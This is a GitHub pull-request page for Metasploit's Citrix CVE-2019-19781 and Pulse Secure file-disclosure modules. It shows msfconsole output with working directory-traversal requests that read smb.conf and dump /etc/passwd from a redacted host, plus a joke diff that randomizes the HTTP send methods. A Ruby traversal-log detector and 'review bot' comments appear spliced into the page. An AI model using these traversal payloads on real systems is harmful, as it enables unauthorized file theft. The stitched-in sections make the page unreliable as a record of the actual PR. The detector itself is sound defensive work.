
Fix #12813, prefer send_request_cgi over send_request_raw #12820

Merged
merged 2 commits into from
Jan 14, 2020

Conversation

wvu
Contributor

@wvu wvu commented Jan 14, 2020

Fixes #12813 and more specifically #12816 (comment). The only tradition is CHAOS.

msf5 auxiliary(scanner/http/citrix_dir_traversal) > run

********************
####################
# Request:
####################
GET /vpn/../vpns/cfg/smb.conf HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/x-www-form-urlencoded


####################
# Response:
####################
HTTP/1.1 200 OK
Date: Tue, 14 Jan 2020 06:40:03 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Last-Modified: Sun, 12 Jan 2020 22:27:43 GMT
ETag: "53-59bf8de0ad5c0"
Accept-Ranges: bytes
Content-Length: 83
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Content-Type: text/plain; charset=UTF-8

[global]
	encrypt passwords = yes
	name resolve order = lmhosts wins host bcast

[+] http://127.0.0.1:8080/vpn/../vpns/cfg/smb.conf - The target is vulnerable to CVE-2019-19781.
[+] Obtained HTTP response code 200 for http://127.0.0.1:8080/vpn/../vpns/cfg/smb.conf. This means that access to /vpn/../vpns/cfg/smb.conf was obtained via directory traversal.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/http/citrix_dir_traversal) >
msf5 auxiliary(gather/pulse_secure_file_disclosure) > run
[*] Running module against [redacted]

[*] Running in manual mode
[*] Dumping /etc/passwd
********************
####################
# Request:
####################
GET /dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/ HTTP/1.1
Host: [redacted]
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/x-www-form-urlencoded


####################
# Response:
####################
HTTP/1.1 200 OK
Cache-Control: max-age=86400, must-revalidate
Last-Modified: Mon, 09 Sep 2019 15:10:05 GMT
Content-Length: 273
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=31536000

root:x:0:0:root:/:/bin/bash
nfast:x:0:0:nfast:/:/bin/bash
bin:x:1:1:bin:/:
nobody:x:99:99:Nobody:/:
dns:x:98:98:DNS:/:
term:x:97:97:Telnet/SSH:/:
web80:x:96:96:Port 80 web:/:
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
postgres:x:102:102:PostgreSQL User:/:

root:x:0:0:root:/:/bin/bash
nfast:x:0:0:nfast:/:/bin/bash
bin:x:1:1:bin:/:
nobody:x:99:99:Nobody:/:
dns:x:98:98:DNS:/:
term:x:97:97:Telnet/SSH:/:
web80:x:96:96:Port 80 web:/:
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
postgres:x:102:102:PostgreSQL User:/:

[+] /Users/wvu/.msf4/loot/20200114004238_default_[redacted]_PulseSecureVPN_774075.bin
[*] Auxiliary module execution completed
msf5 auxiliary(gather/pulse_secure_file_disclosure) >

Note the only difference is Content-Type: application/x-www-form-urlencoded, and it isn't an issue for these vulns.

Since I bypassed query/vars_get, send_request_cgi is fine now.
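The PR output above shows that the traversal check only works if the client sends the request target exactly as written (`/vpn/../vpns/cfg/smb.conf`), which is why `vars_get` encoding was bypassed. The same fact matters on the defending side: an HTTP client or proxy that applies RFC 3986 dot-segment removal never emits such a target, so a log-based detector has to compare the raw request line against its normalized form. The following is an added example, not code from this PR or from Metasploit; the log lines are constructed, modelled on the two requests shown in the PR body, and the function names are my own.

```ruby
# Added example (not from the PR or Metasploit). Log-side check that flags
# request targets which still contain ".." after percent-decoding, i.e. the
# client did NOT normalize them, and reports the path the server would resolve.

# Percent-decode a path (e.g. "%2e" -> "."). Repeated until stable, capped at
# three passes, so a doubly-encoded target is compared in decoded form too.
def decode_percent(path)
  3.times do
    decoded = path.gsub(/%([0-9a-fA-F]{2})/) { $1.hex.chr }
    return decoded if decoded == path
    path = decoded
  end
  path
end

# RFC 3986 section 5.2.4 remove_dot_segments, restricted to absolute paths.
# This is what a normalizing client (or the target filesystem) does to "..".
def normalize_path(path)
  out = []
  path.split('/', -1).each do |seg|
    case seg
    when '.'  then next
    when '..' then out.pop if out.size > 1   # never climb above the root
    else out << seg
    end
  end
  out.size > 1 ? out.join('/') : '/'
end

# A traversal attempt is a target whose decoded path still holds a ".." segment.
def traversal?(target)
  raw_path = target.split('?', 2).first
  decode_percent(raw_path).split('/').include?('..')
end

# Minimal matcher for the request part of an Apache/nginx combined-format line.
REQUEST_RE = /"(?<method>[A-Z]+) (?<target>\S+) HTTP\/[\d.]+" (?<status>\d{3})/

# Scan log text and return one finding per traversal request, including the
# normalized path so an analyst can see which file was actually reached.
def scan_log(text)
  text.each_line.filter_map do |line|
    m = REQUEST_RE.match(line) or next
    next unless traversal?(m[:target])
    raw_path = m[:target].split('?', 2).first
    { target: m[:target],
      resolved: normalize_path(decode_percent(raw_path)),
      status: m[:status].to_i }
  end
end

# Constructed sample log (hypothetical client addresses from TEST-NET ranges).
SAMPLE_LOG = <<~LOG
  203.0.113.5 - - [14/Jan/2020:06:40:03 +0000] "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1" 200 83
  203.0.113.5 - - [14/Jan/2020:06:40:04 +0000] "GET /vpn/index.html HTTP/1.1" 200 1234
  198.51.100.7 - - [14/Jan/2020:06:41:10 +0000] "GET /dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/ HTTP/1.1" 200 273
  198.51.100.7 - - [14/Jan/2020:06:41:11 +0000] "GET /index.html HTTP/1.1" 200 512
LOG

if __FILE__ == $PROGRAM_NAME
  scan_log(SAMPLE_LOG).each do |f|
    puts "traversal: #{f[:target]} -> resolves to #{f[:resolved]} (HTTP #{f[:status]})"
  end
end
```

Run it directly and the two PR-style requests are reported with their resolved paths (`/vpns/cfg/smb.conf` and `/etc/passwd`) while the ordinary page fetches are ignored. The decode step is deliberately applied before the `..` check and before normalization, since the only reliable signal is the request line as the client actually sent it.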
@wvu wvu self-assigned this Jan 14, 2020
wvu added a commit that referenced this pull request Jan 14, 2020
@wvu wvu merged commit 002fe64 into rapid7:master Jan 14, 2020
@wvu wvu deleted the bug/citrix branch January 14, 2020 06:46
@bcoles
Contributor

bcoles commented Jan 14, 2020

The only tradition is CHAOS.

diff --git a/lib/msf/core/exploit/http/client.rb b/lib/msf/core/exploit/http/client.rb
index 3bcec88e4a..364a84ec94 100644
--- a/lib/msf/core/exploit/http/client.rb
+++ b/lib/msf/core/exploit/http/client.rb
@@ -308,7 +308,7 @@ module Exploit::Remote::HttpClient
   #
   # Passes +opts+ through directly to Rex::Proto::Http::Client#request_raw.
   #
-  def send_request_raw(opts={}, timeout = 20, disconnect = false)
+  def send_request_raw2(opts={}, timeout = 20, disconnect = false)
     if datastore['HttpClientTimeout'] && datastore['HttpClientTimeout'] > 0
       actual_timeout = datastore['HttpClientTimeout']
     else
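Review bot: renaming the public `send_request_raw` to `send_request_raw2` in this hunk changes a method that many modules call by name, while the doc comment above it (`Passes +opts+ through directly to Rex::Proto::Http::Client#request_raw`) still describes the old name; if the rename is kept, update the comment to `send_request_raw2` and audit existing callers, otherwise keep the public name and put any behaviour change behind it.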
@@ -354,6 +354,21 @@ module Exploit::Remote::HttpClient
     end
   end
 
+  def send_request_cgi(opts={}, timeout = 20, disconnect = true)
+    if [true, false].sample
+      send_request_raw2(opts, timeout, disconnect)
+    else
+      send_request_cgi2(opts, timeout, disconnect)
+    end
+  end
+
+  def send_request_raw(opts={}, timeout = 20, disconnect = true)
+    if [true, false].sample
+      send_request_raw2(opts, timeout, disconnect)
+    else
+      send_request_cgi2(opts, timeout, disconnect)
+    end
+  end
 
   # Connects to the server, creates a request, sends the request,
   # reads the response
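Review bot: `if [true, false].sample` makes both `send_request_cgi` and `send_request_raw` choose raw or CGI request building at random on every call, so two identical module runs can differ in exactly the points this PR is about (the `Content-Type: application/x-www-form-urlencoded` header and `vars_get` encoding of the URI); the two new wrappers are also byte-for-byte identical, and `send_request_raw` silently changes its `disconnect` default from `false` to `true`. Dispatch deterministically (or drop the wrappers and keep the originals) and restore `disconnect = false` for the raw variant.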
@@ -361,7 +376,7 @@ module Exploit::Remote::HttpClient
   # Passes `opts` through directly to {Rex::Proto::Http::Client#request_cgi}.
   #
   # @return (see Rex::Proto::Http::Client#send_recv))
-  def send_request_cgi(opts={}, timeout = 20, disconnect = true)
+  def send_request_cgi2(opts={}, timeout = 20, disconnect = true)
     if datastore['HttpClientTimeout'] && datastore['HttpClientTimeout'] > 0
       actual_timeout = datastore['HttpClientTimeout']
     else
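Review bot: with `send_request_cgi` renamed to `send_request_cgi2`, the context comment `Passes \`opts\` through directly to {Rex::Proto::Http::Client#request_cgi}` now applies only to `send_request_cgi2`, and the `@return (see Rex::Proto::Http::Client#send_recv))` line carries a stray second closing parenthesis; update the comment for the new name and fix the paren while touching this block.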

@wvu
Contributor Author

wvu commented Jan 14, 2020

APPROVED.

msjenkins-r7 pushed a commit that referenced this pull request Jan 14, 2020